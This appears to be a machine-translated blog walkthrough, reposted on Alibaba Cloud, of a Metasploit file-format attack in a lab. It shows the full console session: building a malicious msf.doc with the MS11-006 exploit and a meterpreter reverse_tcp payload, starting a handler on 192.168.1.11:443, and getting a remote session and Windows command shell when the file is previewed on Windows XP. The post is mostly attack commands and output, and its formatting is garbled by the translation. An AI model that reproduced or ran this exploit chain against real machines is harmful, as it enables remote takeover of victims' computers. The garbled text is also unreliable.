Metasploit file Format Vulnerability penetration attack (successfully obtained shell)

Last Update:2018-07-17 Source: Internet

Author: User

Tags sessions win32

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Environmental BT5R1

MSF > Use windows/fileformat/ms11_006_createsizeddibsection MSF Exploit (ms11_006_createsizeddibsection) > set Payload WINDOWS/METERPRETER/REVERSE_TCP payload = windows/meterpreter/reverse_tcp MSF exploit (ms11_006_ Createsizeddibsection) > Set lhost 192.168.1.11 lhost = 192.168.1.11 MSF exploit (ms11_006_createsizeddibsection) > Set lport 443 lport = 443 MSF exploit (ms11_006_createsizeddibsection) > Set Outputpath/opt/framework/msf3/da Ta/exploits/outputpath =/opt/framework/msf3/data/exploits/msf Exploit (ms11_006_createsizeddibsection) >                     Show Options Module Options (exploit/windows/fileformat/ms11_006_createsizeddibsection): Name current Setting Required Description--------------------------------------FILE
   Name Msf.doc yes the file name.


Outputpath/opt/framework/msf3/data/exploits/yes the output path to use. Payload Options (WINDOWS/METERPRETER/REVERSE_TCP): Name current Setting Required Description------------------------ --------------exitfunc seh yes Exit Technique:seh, thread, process, none Lhost 192.168.1 . One yes the Listen address Lport 443 Yes the listen port Exploit target:id Nam E------0 Automatic MSF exploit (ms11_006_createsizeddibsection) > exploit [*] Creating ' msf.doc ' file:
. [*] Generated output File/opt/framework/msf3/data/exploits/msf.doc MSF exploit (ms11_006_createsizeddibsection) > use Multi/handler MSF exploit (handler) > Set payload windows/meterpreter/reverse_tcp payload = windows/meterpreter/ Reverse_tcp MSF exploit (handler) > Set lhost 192.168.1.11 lhost = 192.168.1.11 MSF exploit (handler) > Set Lpor

T 443 lport = 443 MSF exploit (handler) > exploit-j [*] exploit running as background job. [*] Started Reverse Handler on 192.168.1.11:443 
[*] Starting the payload handler ... MSF exploit (handler) > Sessions-l active Sessions =============== No active session  S. MSF exploit (handler) >

Copy the Msf.doc into XP, start, double click, BT5 not respond.

Later, I use thumbnails to view, do not need to double-click Msf.doc,bt5 to have a reaction (the book said to open the document, estimated error).

MSF exploit (handler) > [*] Sending stage (752128 bytes) to 192.168.1.143 [*] Meterpreter Session 1 opened (192.168.1. 11:443-192.168.1.143:1099) at 2013-05-14 19:32:47-0400 MSF exploit (handler) > sessions-l Active sessions = = =                   ============ Id Type Information Connection------ ---------------------1 meterpreter x86/win32 Root-4556186478\adminis  Trator @ ROOT-4556186478 192.168.1.11:443-192.168.1.143:1099 MSF exploit (handler) > Sessions-i 1 [*] Starting

Interaction with 1 ...

Meterpreter > ls listing:c:\documents and Settings\Administrator ================================================              Mode Size Type Last modified Name-------------------------
----40777/rwxrwxrwx 0 dir 2013-05-14 10:20:44-0400. 40777/rwxrwxrwx 0 dir 2013-05-14 10:20:43-0400  .. 40555/r-xr-xr-x 0 dir 2013-05-14 10:21:13-0400 application Data 40777/rwxrwxrwx 0 dir 2013-05-14 10: 14:40-0400 Cookies 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 Desktop 40555/r-xr-xr-x 0 dir 20 13-05-14 10:21:21-0400 Favorites 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 Local Settings 40555/R-XR-XR -X 0 dir 2013-05-14 10:21:22-0400 My Documents 100666/rw-rw-rw-786432 fil 2013-05-14 11:30:17-0400 ntus ER.  DAT 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30-0400 nethood 40777/rwxrwxrwx 0 dir 2013-05-14 17:51:30 -0400 printhood 40555/r-xr-xr-x 0 dir 2013-05-14 11:30:35-0400 recent 40555/r-xr-xr-x 0 dir 2013-0       5-14 10:21:02-0400 SendTo 40555/r-xr-xr-x 0 dir 2013-05-14 17:51:30-0400 Start Menu 40777/rwxrwxrwx 0 Dir 2013-05-14 10:10:10-0400 Templates 100666/rw-rw-rw-1024 fil 2013-05-14 11:32:49-0400 Ntuser.dat.LOG 100 666/rw-rw-rw-1Fil 2013-05-14 10:23:33-0400 ntuser.ini meterpreter > SysInfo computer:root-4556186478 OS
: Windows XP (Build 2600, Service Pack 3).
Architecture:x86 System language:en_us meterpreter:x86/win32 Meterpreter > Shell Process 1888 created.
Channel 1 created.

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator>

If you switch to the Simplified Chinese version of XP and view it with thumbnails, you will fail to get the shell.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More